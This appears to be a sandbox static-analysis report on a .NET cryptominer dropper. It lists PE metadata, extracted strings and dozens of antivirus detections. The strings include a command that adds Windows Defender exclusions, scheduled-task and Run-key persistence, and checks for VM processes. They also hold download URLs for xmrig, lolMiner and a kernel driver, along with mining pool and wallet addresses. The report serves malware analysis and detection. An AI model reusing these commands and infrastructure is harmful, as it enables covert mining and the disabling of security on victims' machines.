Static | ZeroBOX

PE Compile Time

2051-12-11 12:03:22

PDB Path

C:\Users\Administrator\Desktop\Pch3lkinMinerBuilder\Task32Main\Task32Main\obj\Debug\Task32Main.pdb

PE Imphash

f34d5f2d4577ed6d9ceec516c1f5a744

Sections

Name    Virtual Address  Virtual Size  Size of Raw Data  Entropy
.text   0x00002000       0x00004640    0x00004800        5.39735109059
.rsrc   0x00008000       0x000006b8    0x00000800        3.87840901197
.reloc  0x0000a000       0x0000000c    0x00000200        0.0815394123432

Resources

Name         Offset      Size        Language      Sub-language     File type
RT_VERSION   0x00008090  0x000003aa  LANG_NEUTRAL  SUBLANG_NEUTRAL  Dyalog APL workspace 32-bit classic big-endian version 52.0
RT_MANIFEST  0x0000844c  0x00000268  LANG_NEUTRAL  SUBLANG_NEUTRAL  XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

Library mscoree.dll:
0x402000 _CorExeMain

!This program cannot be run in DOS mode.
`.rsrc
@.reloc
v4.0.30319
#Strings
string_b10
<>9__36_0
<RS>b__36_0
string_b11
string_1
bool_1
IEnumerable`1
List`1
string_b1
string_b12
Microsoft.Win32
ToInt32
string_2
Func`2
string_b2
string_b13
string_3
string_b3
string_b14
ToInt64
string_4
string_b4
string_b15
string_5
string_b5
string_b16
string_6
string_b6
string_7
string_b7
string_w7
string_8
string_b8
string_9
string_b9
<Module>
System.IO
mscorlib
set_Verb
System.Collections.Generic
DownloadFileAsync
OpenRead
Thread
Synchronized
ClassItemField
ConnectToInterface
MakeSpace
defaultInstance
set_AutoScaleMode
FileMode
get_Unicode
Enumerable
IDisposable
Double
RuntimeTypeHandle
GetTypeFromHandle
set_FormBorderStyle
set_WindowStyle
ProcessWindowStyle
get_ExStyle
set_ExStyle
set_Name
get_ProcessName
GetProcessesByName
ReadLine
WriteLine
LocalMachine
SecurityProtocolType
InitializeHardware
CheckSystemHardware
System.Core
get_Culture
set_Culture
resourceCulture
ApplicationSettingsBase
Dispose
TryParse
Create
EditorBrowsableState
Delete
STAThreadAttribute
CompilerGeneratedAttribute
GuidAttribute
GeneratedCodeAttribute
DebuggerNonUserCodeAttribute
DebuggableAttribute
EditorBrowsableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
AssemblyTrademarkAttribute
TargetFrameworkAttribute
AssemblyFileVersionAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
set_UseShellExecute
isexecute
DeleteValue
GetValue
Task32Main.exe
set_ClientSize
System.Threading
Encoding
System.Runtime.Versioning
ToBase64String
ToString
disposing
System.Drawing
IsMatch
GetTempPath
GetFolderPath
get_Length
System.ComponentModel
set_SecurityProtocol
ContainerControl
FileStream
getparam
Program
get_Item
System
Random
resourceMan
Task32Main
set_ShowIcon
Application
System.Configuration
System.Globalization
System.Reflection
ManagementObjectCollection
FileInfo
GetHardwareInfo
CultureInfo
FileSystemInfo
set_StartInfo
ProcessStartInfo
DirectoryInfo
System.Linq
set_ShowInTaskbar
StreamReader
TextReader
SpecialFolder
get_ResourceManager
ServicePointManager
ManagementObjectSearcher
System.CodeDom.Compiler
IContainer
CurrentUser
StreamWriter
TextWriter
ManagementObjectEnumerator
GetEnumerator
.cctor
System.Diagnostics
System.Runtime.InteropServices
System.Runtime.CompilerServices
System.Resources
Task32Main.Properties.Resources.resources
Task32Main.Fregat.resources
DebuggingModes
Task32Main.Properties
EnableVisualStyles
GetValueNames
GetSubKeyNames
GetProcesses
set_Attributes
FileAttributes
GetBytes
Settings
Equals
get_CreateParams
System.Windows.Forms
set_AutoScaleDimensions
System.Text.RegularExpressions
get_Chars
WIN32_Class
FileAccess
GetCurrentProcess
set_Arguments
components
Exists
Concat
Repeat
Fregat
ManagementBaseObject
ManagementObject
CloseProject
Select
System.Net
get_Default
SetCompatibleTextRenderingDefault
WebClient
System.Management
Environment
InitializeComponent
get_Current
AutoStart
Convert
SuspendLayout
ResumeLayout
MoveNext
System.Text
set_Text
set_CreateNoWindow
ToArray
OpenSubKey
RegistryKey
get_Assembly
CreateDirectory
Registry
set_Opacity
op_Equality
op_Inequality
WrapNonExceptionThrows
Programs Engine
Microsoft
Windows
Copyright
2021
$d45ad80b-f521-49c4-8aea-bfca2f21b9bf
10.0.19041.746
.NETFramework,Version=v4.6.1
FrameworkDisplayName
.NET Framework 4.6.1
3System.Resources.Tools.StronglyTypedResourceBuilder
16.0.0.0
KMicrosoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator
16.10.0.0
lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
PADPADP
lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
PADPADP
RSDS%s
C:\Users\Administrator\Desktop\Pch3lkinMinerBuilder\Task32Main\Task32Main\obj\Debug\Task32Main.pdb
_CorExeMain
mscoree.dll
<?xml version="1.0" encoding="utf-8"?>
<assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v1">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="requireAdministrator" uiAccess="false" />
</requestedPrivileges>
</security>
</trustInfo>
<compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">
<application>
</application>
</compatibility>
</assembly>
winlogson.exe
WinRing0x64.sys
dllhost.exe
/C powershell -EncodedCommand "
#> Add-MpPreference <#
#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#
#> -Force <#
" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off
cmd.exe
Windows Server [0-9]{4}|Server|XP|Vista|Educational|Workstation(\w?)
APU|COPMUTE CORES(\w?)
Win32_Processor
Win32_OperatingSystem
Caption
Vmtoolsd
Vmwaretrat
Vmwareuser
Vmacthlp
vboxservice
vboxtray
root\CIMV2
SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
TotalPhysicalMemory
SELECT * FROM
Software\Microsoft\Windows\CurrentVersion\Run\
dllhost
NordVPN
Discord
EpicGamesLauncher
OneDrive
SecurityHealthSystray
WindowsDefender
Cortana
WmiPrvSE
AntiMalwareServiceExecutable
101XPGameCenter
FACEIT
Opera GX Browseer Assistant
Spotify
Voicemod
Wargaming.net Game Center
Gaijin.Net Updater
RegSvc
MicrosoftEdgeUpd
OneDriveService
NvStray
C:\Windows\System32\Tasks\NvStray\
/c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "
" /TR "
dllhost.exe"
/c SCHTASKS /CREATE /SC HOURLY /TN "
Service_bk
conhost
abcdefhijlmnopqstuvwxyABCDEGHJKLMNORSTUVWYZ012356789
adeghijkmnorstuvyzACFGHJKLNOQSXZ013468
logs.uce
SystemErrorReports.log
dxdiag.bin
dxlog.log
SystemInterrupts.tmp
LogSystemData.log
ReportError.bin
datafiles\
RuntimeBrokerLogs\
winSecurityHealthStray\
mib.bin
SYSTEM\CurrentControlSet\Control\Video\
HardwareInformation.qwMemorySize
http://185.215.113.51/WatchDog.exe
http://185.215.113.51/lolMiner.exe
http://185.215.113.51/xmrig.exe
ETCHASH
etc.2miners.com:1010
0x7fe2496e102A4E43617eb2E95B5d1D1C3f6Db972
pool.hashvault.pro:443
ZEPHYR3c6xGj8D5oP4tzKQbPn2dNdse6aPRWxNBiwBFrg7RFN4jf1cqgj5qdR9Wdru44g2FATJHHH38oFDTH6krgKntSzLc5Csy3t
F(Ff4f67h((jgf
http://185.215.113.51/WinRing0x64.sys
https://pastebin.com/raw/YpJeSRBC
Dllhost\
HostData\
ProgramV3
Task32Main.Properties.Resources
winlogson
dllhost
conhost
WinRing0x64.sys
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
Programs Engine
CompanyName
Microsoft
Windows
FileDescription
Programs Engine
FileVersion
10.0.19041.746
InternalName
Task32Main.exe
LegalCopyright
Copyright
2021
LegalTrademarks
OriginalFilename
Task32Main.exe
ProductName
Programs Engine
ProductVersion
10.0.19041.746
Assembly Version
10.0.19041.746
Antivirus Signature
Bkav Clean
Lionic Trojan.Win32.Miner.a!c
Elastic malicious (high confidence)
MicroWorld-eScan Gen:Variant.Jalapeno.12820
CMC Clean
CAT-QuickHeal Trojan.YakbeexMSIL.ZZ4
Skyhigh ACL/Generic Coinminer.VNWH
ALYac Gen:Variant.Jalapeno.12820
Cylance Unsafe
Zillya Trojan.CoinMiner.Win32.49859
Sangfor Suspicious.Win32.Save.a
CrowdStrike win/malicious_confidence_100% (W)
Alibaba TrojanDownloader:MSIL/Tasker.0a4af6b2
K7GW Trojan ( 0058f7721 )
K7AntiVirus Trojan ( 0058f7721 )
huorong TrojanDropper/MSIL.Agent.eo
Baidu Clean
VirIT Clean
Paloalto generic.ml
Symantec ML.Attribute.HighConfidence
tehtris Clean
ESET-NOD32 a variant of MSIL/CoinMiner.BSJ
APEX Clean
Avast Win32:CoinminerX-gen [Trj]
Cynet Clean
Kaspersky HEUR:Trojan-Downloader.MSIL.Miner.gen
BitDefender Gen:Variant.Jalapeno.12820
NANO-Antivirus Trojan.Win32.Miner.kvcqvr
ViRobot Clean
Tencent Malware.Win32.Gencirc.14297180
Sophos Mal/ILAgent-B
F-Secure Heuristic.HEUR/AGEN.1365229
DrWeb Trojan.BtcMine.3634
VIPRE Gen:Variant.Jalapeno.12820
TrendMicro Clean
McAfeeD Real Protect-LS!C11A82D699A0
Trapmine Clean
CTX exe.trojan.msil
Emsisoft Gen:Variant.Jalapeno.12820 (B)
Ikarus Trojan.MSIL.CoinMiner
FireEye Generic.mg.c11a82d699a06d9b
Jiangmin Clean
Webroot Clean
Varist W32/MSIL_Kryptik.HRL.gen!Eldorado
Avira HEUR/AGEN.1365229
Fortinet MSIL/CoinMiner.BSJ!tr
Antiy-AVL Clean
Kingsoft MSIL.Trojan-Downloader.Miner.gen
Gridinsoft Risk.CoinMiner.C.sd!yf
Xcitium Malware@#1w7onykqyop6m
Arcabit Trojan.Jalapeno.D3214
SUPERAntiSpyware Clean
Microsoft Trojan:MSIL/Tasker!MTB
Google Detected
AhnLab-V3 Trojan/Win.RealProtect-LS.C5207348
Acronis Clean
McAfee ACL/Generic Coinminer.VNWH
TACHYON Clean
VBA32 Downloader.MSIL.Pabin.Heur
Malwarebytes BitcoinMiner.Trojan.Miner.DDS
Panda Trj/GdSda.A
Zoner Clean
TrendMicro-HouseCall Clean
Rising Trojan.CoinMiner!8.30A (CLOUD)
Yandex Clean
SentinelOne Static AI - Malicious PE
MaxSecure Clean
GData MSIL.Trojan.Agent.BAW
AVG Win32:CoinminerX-gen [Trj]
DeepInstinct MALICIOUS
alibabacloud Trojan[dropper]:Win/Agent.VDD
No IRMA results available.